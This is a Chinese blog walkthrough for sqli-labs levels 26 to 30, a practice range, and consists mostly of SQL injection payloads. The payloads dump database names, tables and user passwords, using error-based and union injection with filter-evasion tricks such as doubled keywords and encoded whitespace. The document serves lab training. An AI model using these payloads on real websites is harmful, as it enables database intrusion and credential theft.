sqli-labs靶场通关攻略(26-30关)

嘤嘤奶嘴酱2024-08-26 17:29

第26关 (过滤# -- 空格 and or 等等)

查数据库

这关可以看到,他过滤了我们很多字符

那么我们开始尝试绕过过滤

空格使用括号绕过 and和or使用双写绕过

?id=1'aandnd(updatexml(1,concat(0x7e,(select(database())),0x7e),1))aandnd'1=1

查表

?id=1'aandnd(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema='security'))),1))aandnd'1=1

查列

?id=1'aandnd(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema='security'aandnd(table_name='users')))),1))aandnd'1=1

查数据

?id=1'aandnd(updatexml(1,concat(0x7e,(select(group_concat(passwoorrd,username))from(users))),1))aandnd'1=1

第27关(过滤 union、select、注释、空格

查数据库

?id=1'and(updatexml(1,concat(0x7e,database(),0x7e),1))and'1=1

查表

?id=1'and(updatexml(1,concat(0x7e,(selselecselecttect(group_concat(table_name))from(information_schema.tables)where(table_schema='security'))),1))and'1=1

查列

?id=1'and(updatexml(1,concat(0x7e,(selselecselecttect(group_concat(column_name))from(information_schema.columns)where(table_schema='security'and(table_name='users')))),1))and'1=1

查数据

?id=1'and(updatexml(1,concat(0x7e,(selselecselecttect(group_concat(password,username))from(users))),1))and'1=1

第28关(双写+%0a+大小写+('1')=('1绕过)

查数据

?id=0')%09ununion%09selection%09select%091,database(),3%09and%09('1'='1

查表

?id=0')uniunion%0Aselecton%0Aselect%0A1,2,group_concat(table_name)from%0Ainformation_schema.tables%0Awhere%0Atable_schema='security'and('1=1

查列

?id=0')uniunion%0Aselecton%0Aselect%0A1,2,group_concat(column_name)from%0Ainformation_schema.columns%0Awhere%0Atable_schema='security'%0Aand%0Atable_name='users'%0Aand('1=1

第29关( ' 闭合)

查库

?id=' union select 1,2,database() --+

查表

?id=' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

查列

?id=' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

查数据

?id=' union select 1,2,group_concat(username,0x7e,password) from users--+

第30关( " 闭合)

查库

?id=" union select 1,2,database() --+

查表

?id=" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

查列

?id=" union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

查数据

?id=" union select 1,2,group_concat(username,0x7e,password) from users--+
相关推荐
杨浦老苏6 分钟前
跨平台数据库管理软件SQLynx
数据库·docker·群晖
Flying_Fish_roe6 分钟前
Java中NoSQL 与分布式数据库
java·数据库·nosql
草木·君15 分钟前
【SQL】百题计划:SQL排序Order by的使用。
数据库·sql
小时候的阳光21 分钟前
Docker方式部署ProxySQL和Keepalived组合实现MGR的高可用访问
mysql·docker·keepalived·mgr·proxysql
好奇的菜鸟1 小时前
GORM安全-保护你的应用免受SQL注入攻击
数据库·sql·安全
机智的小神仙儿1 小时前
我是Redis,请看我和mysql是如何交互的吧~
redis·mysql·缓存·交互
程序员大金1 小时前
基于SpringBoot+Vue+MySQL的垃圾分类回收管理系统
java·vue.js·spring boot·后端·mysql·mybatis
盒马盒马1 小时前
MySQL:事务
数据库·mysql
insid1out1 小时前
python 连接 oracle 报错
数据库·oracle
码猩1 小时前
VBA 把Excel表当做一个大数据库来操作
数据库·excel
热门推荐
01RAG 实践- Ollama+RagFlow 部署本地知识库022024年高教社杯数学建模国赛C题超详细解题思路分析03【2024数模国赛赛题思路公开】国赛B题思路丨附可运行代码丨无偿自提04组基轨迹建模 GBTM的介绍与实现(Stata 或 R)05【2024高教社杯全国大学生数学建模竞赛】B题 生产过程中的决策问题——解题思路 代码 论文062024 高教社杯 数学建模国赛 (A题)深度剖析|“板凳龙” 闹元宵|数学建模完整代码+建模过程全解全析07Coze扣子平台完整体验和实践(附国内和国际版对比)082024年高教杯国赛(C题)数学建模竞赛解题思路|完整代码论文集合092024 年高教社杯全国大学生数学建模竞赛题目-A 题 “板凳龙” 闹元宵10CCF-CSP认证考试 202406-3 文本分词 100分题解